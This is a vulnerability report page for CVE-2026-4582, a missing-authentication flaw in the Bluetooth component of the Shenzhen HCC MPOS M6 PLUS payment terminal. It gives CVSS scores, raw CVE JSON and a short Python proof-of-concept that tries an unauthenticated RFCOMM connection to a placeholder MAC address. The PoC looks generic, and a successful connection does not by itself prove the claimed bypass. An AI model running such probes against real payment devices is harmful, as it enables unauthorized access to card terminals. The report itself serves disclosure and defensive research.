Security Vulnerability Report
CVE-2026-4582 CVSS 5.0 MEDIUM

CVE-2026-4582

Published: 2026-03-23 10:16:08
Last Modified: 2026-04-29 01:00:02

Description

A security vulnerability has been detected in Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Affected by this vulnerability is an unknown functionality of the component Bluetooth. Such manipulation leads to missing authentication. The attack must be carried out from within the local network. Attacks of this nature are highly complex. The exploitation appears to be difficult. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score: 5.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import bluetooth


def exploit_bluetooth_auth_bypass(target_mac):
    """
    PoC for CVE-2026-4582
    Attempts to connect to the target MPOS device via Bluetooth
    exploiting the missing authentication vulnerability.
    """
    port = 1  # Default RFCOMM port
    print(f"[*] Targeting MAC: {target_mac}")
    try:
        # Create a Bluetooth socket
        sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
        # Attempt to connect without authentication
        # If successful, the vulnerability is confirmed
        sock.connect((target_mac, port))
        print("[+] Connection established! Auth bypass successful.")
        # Send test data
        sock.send("\x01\x02\x03")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
        return False


if __name__ == "__main__":
    # Replace with the actual MAC address of the vulnerable device
    TARGET_MAC = "00:11:22:33:44:55"
    exploit_bluetooth_auth_bypass(TARGET_MAC)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4582", "sourceIdentifier": "[email protected]", "published": "2026-03-23T10:16:08.290", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Affected by this vulnerability is an unknown functionality of the component Bluetooth. Such manipulation leads to missing authentication. The attack must be carried out from within the local network. Attacks of this nature are highly complex. The exploitation appears to be difficult. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en Shenzhen HCC Technology MPOS M6 PLUS 1V.31-N. Afectada por esta vulnerabilidad es una funcionalidad desconocida del componente Bluetooth. Tal manipulación conduce a autenticación faltante. El ataque debe ser llevado a cabo desde dentro de la red local. Ataques de esta naturaleza son altamente complejos. La explotación parece ser difícil. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera. 
Análisis estadístico dejó claro que VulDB proporciona la mejor calidad para datos de vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", 
"scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 4.3, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 3.2, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/Davim09/m6plusexploit/blob/main/docs/CVE-1-Authentication.md", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/775433", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/352419", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/352419/cti", "source": "[email protected]"}]}}